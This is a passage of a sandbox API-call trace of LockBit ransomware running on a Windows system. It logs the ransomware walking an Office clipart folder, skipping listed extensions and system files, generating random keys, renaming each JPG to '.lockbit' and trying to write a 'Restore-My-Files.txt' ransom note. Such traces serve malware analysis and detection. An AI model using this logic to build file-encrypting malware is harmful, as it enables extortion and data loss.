Office\\CLIPART\\PUB60COR\\") returned="" [0160.770] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382963.JPG") returned=".JPG" [0160.770] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.770] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.770] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.771] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.771] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.771] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.771] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.771] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382963.JPG.lockbit") returned 72 [0160.771] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382963.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382963.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.772] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.772] malloc (_Size=0x40068) returned 0x3df0008 [0160.773] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=97774) returned 1 [0160.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.773] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.774] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.774] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382963.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382963.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.805] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.805] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.809] free (_Block=0x1fa2ed8) [0160.810] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382963.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.810] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.810] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.810] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1bb02, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382965.JPG", cAlternateFileName="")) returned 1 [0160.810] lstrcmpiW (lpString1=".", lpString2="J0382965.JPG") returned -1 [0160.810] lstrcmpiW (lpString1="..", lpString2="J0382965.JPG") returned -1 [0160.810] PathFindExtensionW (pszPath="J0382965.JPG") returned=".JPG" [0160.810] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.810] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.810] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.810] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.810] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.810] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.810] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.810] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.810] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.810] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.810] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.810] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.810] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.811] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.811] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.811] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.811] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.811] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.811] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.811] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.811] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.811] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.812] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.812] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.812] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.812] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.812] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.812] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.812] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.812] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.812] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.812] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.812] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.812] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.812] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.812] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382965.JPG") returned 1 [0160.812] lstrcmpiW (lpString1="ntldr", lpString2="J0382965.JPG") returned 1 [0160.812] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382965.JPG") returned 1 [0160.812] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382965.JPG") returned -1 [0160.812] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382965.JPG") returned -1 [0160.812] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382965.JPG") returned 1 [0160.812] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382965.JPG") returned -1 [0160.812] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.812] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382965.JPG") returned=".JPG" [0160.812] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.812] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.813] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.813] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.814] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382965.JPG.lockbit") returned 72 [0160.814] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382965.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382965.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.815] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.815] malloc (_Size=0x40068) returned 0x3df0008 [0160.815] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=113410) returned 1 [0160.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.816] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.821] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382965.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382965.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.821] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.821] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.825] free (_Block=0x1fa2ed8) [0160.825] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382965.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.826] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.826] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.826] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382966.JPG", cAlternateFileName="")) returned 1 [0160.826] lstrcmpiW (lpString1=".", lpString2="J0382966.JPG") returned -1 [0160.826] lstrcmpiW (lpString1="..", lpString2="J0382966.JPG") returned -1 [0160.826] PathFindExtensionW (pszPath="J0382966.JPG") returned=".JPG" [0160.826] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.826] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.826] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.826] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.826] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.826] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.826] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.826] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.826] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.826] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.826] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.826] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.826] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.826] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.826] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.826] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.827] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.827] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.828] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.828] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.828] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382966.JPG") returned 1 [0160.828] lstrcmpiW (lpString1="ntldr", lpString2="J0382966.JPG") returned 1 [0160.828] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382966.JPG") returned 1 [0160.828] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382966.JPG") returned -1 [0160.828] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382966.JPG") returned -1 [0160.828] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382966.JPG") returned 1 [0160.828] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382966.JPG") returned -1 [0160.828] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.828] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382966.JPG") returned=".JPG" [0160.828] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.828] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.828] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.828] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.829] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.829] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.829] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382966.JPG.lockbit") returned 72 [0160.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382966.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382966.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.830] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.830] malloc (_Size=0x40068) returned 0x3df0008 [0160.830] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=100488) returned 1 [0160.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.831] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.831] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.831] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.832] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0160.837] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382966.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382966.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.837] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.837] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.127] free (_Block=0x1fa2ed8) [0161.127] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382966.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.127] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.127] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x16d08, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382967.JPG", cAlternateFileName="")) returned 1 [0161.127] lstrcmpiW (lpString1=".", lpString2="J0382967.JPG") returned -1 [0161.127] lstrcmpiW (lpString1="..", lpString2="J0382967.JPG") returned -1 [0161.127] PathFindExtensionW (pszPath="J0382967.JPG") returned=".JPG" [0161.127] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.127] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.127] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.127] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 